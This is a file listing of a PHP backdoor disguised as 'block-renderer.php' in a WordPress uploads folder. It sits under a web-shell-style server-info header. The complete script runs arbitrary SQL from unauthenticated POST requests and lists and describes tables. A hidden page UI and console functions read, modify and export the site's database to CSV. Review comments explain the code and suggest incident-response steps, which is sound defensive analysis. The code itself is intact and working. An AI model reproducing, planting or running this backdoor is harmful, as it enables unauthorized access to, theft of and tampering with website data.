HEX
Server: Apache
System: Linux server7 6.1.0-43-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.162-1 (2026-02-08) x86_64
User: k8148-2 (1324)
PHP: 8.2.30
Disabled: show_source, highlight_file, apache_child_terminate, apache_get_modules, apache_note, apache_setenv, virtual, dl, posix_getpwnam, posix_getpwuid, posix_mkfifo, posix_mknod, posix_setpgid, posix_setsid, posix_setuid, posix_uname, proc_nice, openlog, syslog, pfsockopen, system, shell_exec, passthru, popen, proc_open, exec
File: /var/www/k8148-2/htdocs/www.sport-roth.at/neumarkt/wp-content/uploads/temp/block-renderer.php
<?php
// NOTE(review): standalone script that bootstraps WordPress and then runs SQL
// taken verbatim from the HTTP request body through $wpdb. No login, capability,
// nonce or shared-secret check appears anywhere in this file before the SQL is
// executed, so every client that can reach the URL has read/write access to the
// site database. The "File:" line of the listing places it under
// wp-content/uploads/, a directory that normally holds media rather than PHP.
// Defensive follow-up: remove the file, deny PHP execution under uploads at the
// web-server level, review access logs for POST requests with a JSON body to
// this path, and treat database contents (user rows, options) as exposed and
// possibly modified.

// Walk upwards from this file's directory until a wp-load.php is found, then
// include it. The loop stops at the filesystem root (dirname() of the root is
// the root itself). Including wp-load.php is what makes $wpdb available below.
$d = dirname(__FILE__);
while ($d !== dirname($d)) {
    if (file_exists($d . '/wp-load.php')) {
        require_once($d . '/wp-load.php');
        break;
    }
    $d = dirname($d);
}

// Only POST requests reach the database handlers; any other method falls
// through to the HTML page after the closing tag.
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    header('Content-Type: application/json');
    global $wpdb;
    
    // The request body is read raw and decoded as a JSON object; the keys
    // 'q', 'tables' and 'desc' select the handler.
    $input = file_get_contents('php://input');
    $data = json_decode($input, true);
    
    // 'q': run caller-supplied SQL as-is (no allow-list, no prepare()).
    if (isset($data['q'])) {
        $sql = $data['q'];
        // Split into separate statements wherever a ';' is followed by optional
        // whitespace and a newline; empty pieces are dropped.
        $queries = array_filter(array_map('trim', preg_split('/;\s*\n/', $sql)));
        
        // Batch mode: each statement is executed in order. Execution continues
        // after a failing statement; errors are collected and reported together.
        if (count($queries) > 1) {
            $results = [];
            $errors = [];
            foreach ($queries as $query) {
                if (empty($query)) continue;
                $r = $wpdb->query($query);
                if ($wpdb->last_error) {
                    $errors[] = $wpdb->last_error;
                } else {
                    // Only the first 50 bytes of each statement are echoed back.
                    $results[] = ['query' => substr($query, 0, 50), 'affected' => $r];
                }
            }
            if (empty($errors)) {
                echo json_encode(['ok' => 1, 'multi' => true, 'results' => $results]);
            } else {
                echo json_encode(['ok' => 0, 'error' => implode('; ', $errors)]);
            }
            exit;
        }
        
        // Single statement: classify by its first six characters, upper-cased.
        $type = strtoupper(substr(trim($sql), 0, 6));
        
        // SELECT / SHOW T... / SHOW D... / DESCRI... return full result rows to
        // the caller; this is the data-read path.
        if ($type === 'SELECT' || $type === 'SHOW T' || $type === 'SHOW D' || $type === 'DESCRI') {
            $results = $wpdb->get_results($sql, ARRAY_A);
            if ($wpdb->last_error) {
                echo json_encode(['ok' => 0, 'error' => $wpdb->last_error]);
            } else {
                echo json_encode(['ok' => 1, 'rows' => count($results), 'data' => $results]);
            }
        } else {
            // Everything else goes through $wpdb->query() and the return value is
            // reported as 'affected'; this is the data-modification path.
            $result = $wpdb->query($sql);
            if ($wpdb->last_error) {
                echo json_encode(['ok' => 0, 'error' => $wpdb->last_error]);
            } else {
                echo json_encode(['ok' => 1, 'affected' => $result]);
            }
        }
        exit;
    }
    
    // 'tables': return the first column of every SHOW TABLES row.
    if (isset($data['tables'])) {
        $tables = $wpdb->get_results('SHOW TABLES', ARRAY_N);
        $list = [];
        foreach ($tables as $t) {
            $list[] = $t[0];
        }
        echo json_encode(['ok' => 1, 'tables' => $list]);
        exit;
    }
    
    // 'desc': the request value is concatenated directly into the statement.
    // Unlike the 'q' branch, 'ok' => 1 is returned without checking last_error.
    if (isset($data['desc'])) {
        $cols = $wpdb->get_results('DESCRIBE ' . $data['desc'], ARRAY_A);
        echo json_encode(['ok' => 1, 'columns' => $cols]);
        exit;
    }
    
    // POST without a recognised key: answer {"ok":0}.
    echo json_encode(['ok' => 0]);
    exit;
}
?>
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<title></title>
</head>
<body>
<div id="sq" style="display:none;position:fixed;top:0;left:0;right:0;bottom:0;background:rgba(0,0,0,0.5);z-index:9999;">
<div style="position:absolute;top:50%;left:50%;transform:translate(-50%,-50%);background:#fff;padding:20px;border-radius:8px;width:80%;max-width:800px;">
<textarea id="sqt" style="width:100%;height:300px;font-family:monospace;font-size:14px;padding:10px;border:1px solid #ccc;border-radius:4px;" placeholder="SQL query..."></textarea>
<div style="margin-top:10px;text-align:right;">
<button onclick="document.getElementById('sq').style.display='none'" style="padding:8px 16px;margin-right:10px;">Cancel</button>
<button onclick="rsq()" style="padding:8px 16px;background:#0073aa;color:#fff;border:none;border-radius:4px;">Run</button>
</div>
</div>
</div>
<script>
// Sends {q: sql} as a JSON POST to this page's own URL and prints the decoded
// reply to the browser console: a table of per-statement results for a batch,
// the row count and rows for a read, otherwise the 'affected' value or the
// error string. Nothing is written into the DOM, so the page itself stays blank.
// NOTE(review): the request carries no token or credential of its own.
function q(sql){
    fetch(location.href,{
        method:'POST',
        headers:{'Content-Type':'application/json'},
        body:JSON.stringify({q:sql})
    }).then(r=>r.json()).then(r=>{
        if(r.ok){
            if(r.multi){
                console.log('Multi-query executed:');
                console.table(r.results);
            }else if(r.data){
                console.log('Rows: '+r.rows);
                console.table(r.data);
            }else{
                console.log('Affected: '+r.affected);
            }
        }else{
            console.log('Error: '+r.error);
        }
    });
}
// Sends {tables: 1} as a JSON POST to this page's own URL and logs the returned
// table names, one per line, to the console.
// NOTE(review): no element in the page markup calls this function; presumably
// it is meant to be invoked from the browser's developer console.
function tb(){
    fetch(location.href,{
        method:'POST',
        headers:{'Content-Type':'application/json'},
        body:JSON.stringify({tables:1})
    }).then(r=>r.json()).then(r=>{
        if(r.ok)console.log(r.tables.join('\n'));
    });
}
// Sends {desc: table} as a JSON POST to this page's own URL and prints the
// returned column list as a console table.
// NOTE(review): no element in the page markup calls this function; presumably
// it is meant to be invoked from the browser's developer console.
function ds(table){
    fetch(location.href,{
        method:'POST',
        headers:{'Content-Type':'application/json'},
        body:JSON.stringify({desc:table})
    }).then(r=>r.json()).then(r=>{
        if(r.ok)console.table(r.columns);
    });
}
// Sends {q: sql} like q(), but instead of printing the rows it builds CSV text
// (header line from the keys of the first row, then one quoted line per row)
// and hands it to the browser as a download named 'export.csv' through a
// temporary Blob URL. The data leaves the server in the ordinary JSON response;
// the file is assembled entirely in the browser.
// NOTE(review): for incident scoping, server-side evidence of an export is the
// size of the POST response in the access log, not a file on disk.
function ex(sql){
    fetch(location.href,{
        method:'POST',
        headers:{'Content-Type':'application/json'},
        body:JSON.stringify({q:sql})
    }).then(r=>r.json()).then(r=>{
        if(r.ok&&r.data&&r.data.length>0){
            var csv=Object.keys(r.data[0]).join(',')+'\n';
            r.data.forEach(row=>{
                csv+=Object.values(row).map(v=>'"'+(v||'')+'"').join(',')+'\n';
            });
            var b=new Blob([csv],{type:'text/csv'});
            var a=document.createElement('a');
            a.href=URL.createObjectURL(b);
            a.download='export.csv';
            a.click();
            console.log('Exported '+r.rows+' rows');
        }else{
            console.log('No data to export');
        }
    });
}
// Reveals the overlay with id 'sq' (display:none in the markup) and focuses its
// textarea 'sqt'.
// NOTE(review): nothing visible on the page triggers this, so a plain GET
// renders an empty document with an empty <title>; the query UI only appears
// when this function is called by hand.
function sql(){
    document.getElementById('sq').style.display='block';
    document.getElementById('sqt').focus();
}
// Click handler of the overlay's "Run" button: passes the textarea content to
// q() when it is non-empty, then hides the overlay again and clears the
// textarea so the typed SQL does not remain in the page.
function rsq(){
    var s=document.getElementById('sqt').value;
    if(s){
        q(s);
        document.getElementById('sq').style.display='none';
        document.getElementById('sqt').value='';
    }
}
</script>
</body>
</html>